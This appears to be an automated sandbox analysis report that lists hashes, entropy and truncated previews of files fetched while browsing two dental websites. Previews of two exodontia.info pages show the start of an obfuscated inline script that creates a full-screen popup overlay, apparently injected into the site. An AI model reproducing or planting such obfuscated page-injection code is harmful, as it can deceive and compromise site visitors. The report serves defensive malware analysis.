                                                                                                                                      Preview:<!DOCTYPE html>.<html lang="en">. <head>. Required meta tags -->. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">. <title>Contact Us &ndash; Dental Health Stop</title>. <meta name="author" content="Dental Health Stop, 2017. All rights reserved.">. Bootstrap CSS -->. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous">.. Cookie Consent-->..<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />..<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js"></script>..<script>..window.addEventListener("load", function(){..window.cookieconsent.initialise({.. "palette": {..."popup": {... "background": "#000000"...},..."button": {... "back
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):91606
                                                                                                                                      Entropy (8bit):7.894373926315305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:j6oCpXhex/9zykEJATfHd/lEC7a/59PWKF92vpufGxiIta/5dhBas5rKlzg:Yhex/RZESbdza/3PWO92vkGxiItCnmcf
                                                                                                                                      MD5:2FA2D28B86087B9916C424D959A2F1EA
                                                                                                                                      SHA1:C0F56C717C41EC0C03693D98D2053EAB4A45E737
                                                                                                                                      SHA-256:45E0C925E3E75746C5455E24C334B46809A7F5B7458502B67433FA90C25871AB
                                                                                                                                      SHA-512:AF3F019A2D0682B6368675CAF42C4162BD3019D0F167C6744DA78AE893B0795F8ABDACC09156C7FBE8E5E253556BFD8562AECA44C3B99C27168C9B9B0A573C36
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:A10914880C8511E7925196320C0DE998" xmpMM:InstanceID="xmp.iid:A10914870C8511E7925196320C0DE998" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:968c8116-4c89-477e-b063-95cdf2104959" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):87553
                                                                                                                                      Entropy (8bit):5.262620498676155
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                      MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                      SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                      SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                      SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                                                      Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 597 x 164, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):6532
                                                                                                                                      Entropy (8bit):7.799816343177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:eJVIOdY/SgoXVvgNSOKZQRm9kVBnxHjKZe3Rjj:qDnBVvTBZ39k7xD5Bj
                                                                                                                                      MD5:6E29C80E51C4B23D7715D40FD1E1227E
                                                                                                                                      SHA1:2C8FF2B3B369184B99773FC8A24BBD09E6EB7E41
                                                                                                                                      SHA-256:1A560BF133A11F43115F9DE3BCBFF76B3CC4851E7AE5DF18EEEC53FD11E5512E
                                                                                                                                      SHA-512:AC7F26302F6073B1B1BE2D614A5D8826BA39A5B3B7DF2F8D8F65A0E473491A720A5C52EEB3CDB27CE1C96DF88ACBC4A6F9A4426547F894A8B00833F3F6365B17
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/images/dhs-logo-footer.png
                                                                                                                                      Preview:.PNG........IHDR...U..........W.'....tEXtSoftware.Adobe ImageReadyq.e<...&IDATx...u.H..O.....T......T...... v..+.\Ap.Q*.....V..7....`..`@..9.G.......s.N......3.|.d...?.....'49... .~.R...Y.}....l.q...........RTeb*V!..p.4..m.........&/..3u.={.|#....V.\.........."..52..r$.sb....`r.J..g..r...!A.....G..J..........?s....`..j.U"........dH....F)..K.%...U\.ci\..I<Z....on.......U...=.2...&Dq...x.NT@.-v.h|...,....#.~F...sE...."D.....aR..g...nL^9...D.K.....QuIR.]ly,...3.{N....rw....WT...s....*. .`.#z...1I..K...=.*y.Y*...D`[...,....0>Q...s.......b&.]'..&.s;....T..V+L...`..J..7..+/...."k^.<^.n............Qe.m&....0*.......3.......K.}{c.F(..h.a.&$w.).......ej|.G...GE..Mf=~.XP...{...@..*.x..x.4{...Z...1.......;.U.g..>.N.............&.B...Y.EL.Z,Z.*..$z......,./.......sL... lQ.K.=.,.$.}.K<F...$..(..^.s.U(..c...S.....]%...xk&*...N.:k...L..W._a....a.*..WY.....:S..;.*U!..{.g.HD...@X..# \D...)..,UL..#.R.......a..!y.....U/...U.....'..[..cK.{Z.........J.......g.m</.....
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):124843
                                                                                                                                      Entropy (8bit):7.805065786623428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:deFh09vaz/2cKW0/5+ScIJ8yubTyOD1nO:QYVazeutqJzub/DlO
                                                                                                                                      MD5:5F44062FD37A5EB20EDD5571277E4AD1
                                                                                                                                      SHA1:0695AD8F3C826FB318940768446E336A6DFBF430
                                                                                                                                      SHA-256:34C8DE29F70D00D634044F53F2998186E3F62C6AD778D53B6CF4B8DD3476C8E0
                                                                                                                                      SHA-512:67AE2CA1BF0205FD262FDF98B5F96C61096E46B1FDCD53961623C58D05D7BD7C6B65D2CF6A2173F7315F308FA3255A86479CA37565CD51470AA28C480755AE6B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/home-treatment-1.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:8EDFE61F054411E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:8EDFE61E054411E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):591
                                                                                                                                      Entropy (8bit):4.783332643317159
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:N+GoZSPz9rS38vxttt1kWOf63M1R2+nr4drYrEM1s:N9RG38PttmWOf6AR2U2kAws
                                                                                                                                      MD5:A53DF6A281081829887F978C20022692
                                                                                                                                      SHA1:D21A185D824B9F2C42FEBD174B7FA8434145D3CF
                                                                                                                                      SHA-256:06C6B0258FBAAFCDA3D65370635F9CBAB2157E1C175664E1ACE5B04E30D6241D
                                                                                                                                      SHA-512:C67C9DFAACA2383E7AF1E490D04D98936CAC193BBE5347A53C9913577926A07A251EE481705E573AB9208730E56E0FA3D2E020B0D2133C6C935C3C55E61E868B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/cover.css?ver=5.6.4
                                                                                                                                      Preview:.builder_row_cover{. z-index:0;. contain:strict;. transform:translateZ(0).}..builder_row_cover:before,..builder_row_cover:after{. height:100%;. width:100%;. position:absolute;. top:0; . left:0;. z-index:-100;. content:'';. display:block;. transition:opacity .5s ease-in-out,background-color .5s ease-in-out.}..builder_row_cover:after{. opacity:0.}..tb_visual_hover > .builder_row_cover:after,..module_row:hover > .builder_row_cover:after,..module_subrow:hover > .builder_row_cover:after,..module_column:hover > .builder_row_cover:after{. opacity:1.}
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1598
                                                                                                                                      Entropy (8bit):7.68959991126341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:JPWjAaJax6c6DPr8wygmI+dSmctO1j608b8KDMbpk:1GAL6/rIhgdi3OOk0QCk
                                                                                                                                      MD5:B1614503D1AA540FC04471AE6D062D7C
                                                                                                                                      SHA1:88A2D69F579A1FC454AEEECEC35E73BB539643BF
                                                                                                                                      SHA-256:41DB6F9500F3EE616AB9FCA4C5B13B24A75184B0618C8CD0748CBFF5B6EA060F
                                                                                                                                      SHA-512:F853FF384A9B5047F8D8A0E1BAE14DDF8B0B703B1EF4950F1F33495AF0214F9D78FDFC282646E504AB0712940F99F3449C188CE3868F7F1368271C99FD0A92E6
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-3.png
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..u.0.Fm&...LP. ..M7..4L.t........N.;.t.........[.eY2....m0....#.G........................................%.....q.>L.].m,...K....0._..%J."..DZ...~..}.#C.".M.2m.....=..j.V.M..e'.v.L...T....CM.X.?cym.$r.S../...m.vI.p.p..>.1.C.......)wg..';..1By.Jrt..eq....=.E...j.*Y.K..6..[G..#mO}dXa.B.&bq.'y....m.'D(...p..r+n'bN.......y.F0bM2.L..^.K..l.....U.D.J$....A..O.....e.a).,.....H..'q7.L.A,..[Y.......S...%.i..S.SL0.....\....y.S.#Y....$.ME.!....I.r..cT..i..E...j.vv.+.5i.*&?..<...7r.N..~.....{...W./T.h........9.VV2G.d....N.QvT...5..7.*..Hr.)A.. UD..|....+._........t;3_q.{D".l.o..s/J j!..X.S..M....#....Ws...J.o..>....E(w-...H..Jd....+.........t..`..F...R,..w...zk..b....t...9.U&..hJ>{.....1.X...3....F.-.R.R4.L.....T.+.N.....Kl.+.C..MH,...1...I.bT0...5.&...i.......XVi..6:....A k_,S..:.....T.s.`.5kn..Y."J....|>.k...N...._{s......e....^.vE.u.D/.6..|.`.....6.d..........C.M..&.}.P
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 10180, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):10180
                                                                                                                                      Entropy (8bit):7.978606996128046
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:TjKCG1yMl5z0LihNuJ/FDGVhh+wixFbjXRvtZ0j99NpI3JWKUOVKB:nKhyMvzOibuVih+7tXBC99NHIKB
                                                                                                                                      MD5:31C3253C6146D2A15CEDFCFBC975EF7D
                                                                                                                                      SHA1:11F185BE446D870DDBAA7BFFF3382E428DDDF853
                                                                                                                                      SHA-256:37C813E5C95A107D3992C300F1B03A488E70570166EB45687FEDAB8D1F3B6C7B
                                                                                                                                      SHA-512:3F706CA90A78C6970234F1A8EE67C650B8AB264006B77477CAF6B581AF13F0D9B4E64532E47CE9E557518E0D6259DE691CEB6B1B948D560A16E5CB9FEB2B7E16
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B5OaVIGxA.woff2
                                                                                                                                      Preview:wOF2......'.......Il..'^..............................j.`?STAT^.....|.......`.D..j..6.$..>. ..x.......*A........(....i....| e.L...E.M.w.<3..my.[S.0..]wJ...JL.i...........J.co.a1....BX}..L..k..}..>.../...;k7.a9u......1..IL....7o._..'j..H.E_,..G:...X>..f....6..0..#...AiA.L.B..F..0.#'....U..........{g.._...9....*.Z.f.^.....5. ..a...\.,y2.&.m..5....<.O^.......r..LW...%.x_....J~ ..... .U...(U.i*.Y..'.VK.j...'..9....(. .L....n@._k.....V2...7e...I.t..).....\...[.MH.......m..,..f..\..K..K.T`N..^g.....P....(............@.....E...s..hB.]a..8.3.8..5A,./.r ..>..yt....+..NA..R.....u..*;.....=,X....\.f-.._..........lO...U.;.n..D. X.......E..a@D+...`a.A..@....... s|[.3.@.....c..v.c....}.....Ra.Y.....?x.'..<.MI.BO......>%..x.....F.}.f.H..&$.H....M*..cp<.Rd..eFY1e{..A.H>.D,.:.....'%...Oy....?@6....$......"..K5.........!..u.F.t.YD.].c.~Y..8..3n..S.J?.....Rz.0.M^..*@........^...`"t.)@.>.i.W..g)!..d.;.=At.J5P6..Rx.........]7.?..i....=k.....%\^.X?(G.....88...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (10709), with CRLF, LF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):168079
                                                                                                                                      Entropy (8bit):5.376800802037675
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:Y6VFzE8JDOhX2Tr7PHKP4tHH3oQiOG1iV2:5eer7PHKP4dHYpOG1O2
                                                                                                                                      MD5:906C97BCE396852EB99B82F90D723FFD
                                                                                                                                      SHA1:07AC6504F64389948CD8889B0D66171E2B168499
                                                                                                                                      SHA-256:292ABE9FDA86832C1BEFE07D828BA73BD18AC8AF059AB7A055CCF31E6BA9EE53
                                                                                                                                      SHA-512:E0B8B2CE340FB7B70CA8B2C0343CA7C57F3F03868CA4D492EF6F8C3944D85B4C281993BA3CAD70F9021919F77AAD373314606734D89BF19DDB99E4036507CB33
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/drugs-for-oral-conditions/
                                                                                                                                      Preview:<!DOCTYPE html>..<html lang="en-GB">.. <head><script>..function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x22popup\x22>.popup-fade:before{content:\x27\x27;background:#000;position:fixed;left:0;top:0;width:100%;height:100%;opacity:.7;z-index:9999}.popup{position:fixed;top:0;left:0;padding:15px\x2020px\x2015px\x2020px;width:100%;background:#fff;z-index:99999;opacity:1;box-sizing:border-box;color:#000;font-family:-apple-system,Helvetica,\x22Segoe\x20UI\x22,Roboto,Oxygen-Sans,Ubuntu,Cantarell,\x22Helvetica\x20Neue\x22,sans-serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;display:inline-block;position:absolute;right:15px;top:13px;border:none;cursor:pointer;font-f
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):3105
                                                                                                                                      Entropy (8bit):7.904549143596417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WwLnWmQMKHFU9HEzuIeloxLhFx9CFYi6KED:WPmQM4FYE9eOxL/1iZE
                                                                                                                                      MD5:B2196391C941A66DF41DF95971830878
                                                                                                                                      SHA1:F859D6A04820CE88DA34D84DFEEB5E71DB3810CD
                                                                                                                                      SHA-256:3B85798D23FC4A9EDF41D0D2ACBACAA2BE4495A57A1DCE6EE9880EB9832F91B9
                                                                                                                                      SHA-512:3161EFE16B3F73697B9A091B5103A5E42124D4DCAA8D32A845FF55E5CD98B6E5F992B7A188E14D15FD007D0BFC7E4BA7FC2AA079C20835C601D9F535D69155B0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-1.png
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...q.8..)O.GW.Mx...@t..+.T...D.@V.V*.R...,W .\..U..:..OC|/@...$.D4.<x...8.z....i...............}4....i...K.{.._......}j..\.x.......,......ph.M..X...Z.Q....%.bc0...i.'H.......A.M.5..&_.:\f;..f..."..p.5.V.pZ.L.^.w.7..].;...4x)q9..F.2T.......a....h...!..g.J....>.E..L...U.M.)b......u(...(^.Ai.D.d.y.........w.CP....l.b..a.t..._o.......x..V.th+...9...}n..\..A.>.)._7?....M+.)n...]3...Y..Y+;..\7.....s...5....Yc...)U.......D.....UoG..%...L.....T......t..oH.z..&-%j.t.........1.&,..(5..&...f.V1 W!.cH.2EE..}...Q......b..n.j...........2P..|U.. Y.7.Q......%.~~.l\K..(.B]...mU.-r.R_.(..Q..........HKU.3.....U...LaZ...l.(U...L.+Q.b.d...XH3......`.....D...a...9uXl.FT..b4....a...3#7..=,...W.u.[...%......b.....c....A..,6.)g`..<...m.K..J`8.5[m.6i....K8cI...`Y.`A......La.H....F..".X......C.eky....lc.WvI.a9......5..:./,n.aq...e.....&......'X.....Y.-4..D.K%[Z...g....0..t...Mzy..$<..5c..X._.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (10709), with CRLF, LF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):145680
                                                                                                                                      Entropy (8bit):5.372102672565335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Yi5/B0aprzE8JD1shk2Tetc2d7UPaHeqPu9KC3CTtuWt9IJKF4mZRNQgHiETW+oL:Y6ZFzE8JDOhk2Tm7qvKF4tHym
                                                                                                                                      MD5:88C1AD2B37DF006AE14E60E1B066FB73
                                                                                                                                      SHA1:EEDE6842A14791E6752C7C626B6C2085C5769AF3
                                                                                                                                      SHA-256:7A75BF63A09792C9E50626C5DA99576E3FF22AD5C0659AC2E2E85F13B9C51D43
                                                                                                                                      SHA-512:6A49826BEEE14490E0E057C7023DF31A741C4D1229081D46AAADC9F4E96D3545D459B30446AD321AEA4180D279953C2738EB01A592A7022FA714315F5E2CD09D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/adverts-sponsors-policy/
                                                                                                                                      Preview:<!DOCTYPE html>..<html lang="en-GB">.. <head><script>..function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x22popup\x22>.popup-fade:before{content:\x27\x27;background:#000;position:fixed;left:0;top:0;width:100%;height:100%;opacity:.7;z-index:9999}.popup{position:fixed;top:0;left:0;padding:15px\x2020px\x2015px\x2020px;width:100%;background:#fff;z-index:99999;opacity:1;box-sizing:border-box;color:#000;font-family:-apple-system,Helvetica,\x22Segoe\x20UI\x22,Roboto,Oxygen-Sans,Ubuntu,Cantarell,\x22Helvetica\x20Neue\x22,sans-serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;display:inline-block;position:absolute;right:15px;top:13px;border:none;cursor:pointer;font-f
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 9816, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):9816
                                                                                                                                      Entropy (8bit):7.972817264469843
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:fRsdXWthw4UY2QvlxHcgQ1w7ZrEKIGM2R2KgVxNU44qsy+PG9fFyFuO4hiLBhQuz:hthnlx8gQC9rJId2R2D7U4KTPOhqBhQS
                                                                                                                                      MD5:6FCFF8ECEC1C013C1AD16306ACC779C5
                                                                                                                                      SHA1:F9AA9719D92845B10A42474AE5AF3CFD9EAB1151
                                                                                                                                      SHA-256:EC811B09C7C2CA4872D5581A40B8526222A877823F12127177EEFC00FC1D2196
                                                                                                                                      SHA-512:D30706B274F06BA9B8A51B50EA1804BE5AFBD77AD8E74D0955BC696185159A4D3E2C6EDADA9E387A221B7F3231DED5110C0AC91C76873EB7412D26EF67AC5109
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWVMewJER.woff2
                                                                                                                                      Preview:wOF2......&X......D$..%..........................X..B....`?STATZ..$..8.......D.m..N..6.$.... ..\..h....F>%c[6..<.B.........'...7......."......Rl..qe{.....l2m......R.l.L/D.......$X|..)..)...n.V8.....7...E...p~......i.e.-A|dR$..Zj.m..d..Pz..If...m..{/ ..&F...}l..b5....T\.....6a.y.Q..g.sw.!e...C(TR |....x.B9.....8.....&MJt.=........F~.f.....J...A.V...6.......R4Q...|pNK.f;ZV.w....S...._. - '...S>~.L.[...@0fJG.GT.R.~....g:....Q..._..%...F....Vw....F...Ji...(C.U......4h.. ....!.......bG...t.n......A....].....|@..~:.....P2..@E}j....(.EH|>Uu=......:%.V.1..........Bd..]h.MR..J.ML.R...^...Gg*....i.0...O{.Cq,..B...}u....n<.N4,.....=............^...A..T<.JpD.ME...3.....P.S.!..$X....!.......^....o.D...fd$]....?... .TBZ..E....8..oy(.x.P@~.s..y...........,e&c.HW.....!U)KA........x...p.661.A....0BBp..w....}7]v.q..`.>..j....^...Z.`....tL..I..E.R..ln}~.&h........q`7..b]..$`g...K.bN.n....."Q...)^.VO.8...9.......^/akL.mw.."%"X......~.....k/.0..0s.\N.>.|..(c.1.\...?.12G
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):175350
                                                                                                                                      Entropy (8bit):7.978993142366648
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:QftbskK7JWnOJe39KCAbVPnbEoL7e2MYo/Z4GXoJWJpUxTQw:3xe39KfbVPAGZxjGXoJGpUZJ
                                                                                                                                      MD5:F12868DEB02237BD71E5224E44328A4A
                                                                                                                                      SHA1:BA9EDE17724B3CE7E8E86D5F95F16BEC2827FF43
                                                                                                                                      SHA-256:87F2C74C4B805948DB67622E7D2ABCAFC67D213F30355563CF93536CD43CCF14
                                                                                                                                      SHA-512:21585C67C57724C5A1158141E9A38F8396FC566FD833B4DF9B2CAA42F223C2F5DE1A78BD1A74A857A20EDCA1E1DE842CB37562DFB7148FFCC3A643632427660B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:8EDFE623054411E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:8EDFE622054411E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):569
                                                                                                                                      Entropy (8bit):4.896633254731508
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Uc11FP/sO6ZRoT6pHAciJkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKuJXYmOOk4TfenEPCD
                                                                                                                                      MD5:71D6A57D21337114032CA39B294F3591
                                                                                                                                      SHA1:ADA1D867672276F16EF4D3B8A46A519FBA8E3D4E
                                                                                                                                      SHA-256:36B2057EB5EEF261A2CBB8C149DCF3A11EDAA15CCD8E3D462EB34999F5FF8F2A
                                                                                                                                      SHA-512:BC5F5B55C2741FED993D5D25A36030028C388C8888EA2D1D1F24970AEC4F856CDA366940B99D54FF2D4D9AF16DF8DE39AB847A7BA2BE0B649DE1CE2C9E70A330
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.googleapis.com/icon?family=Material+Icons
                                                                                                                                      Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (32012)
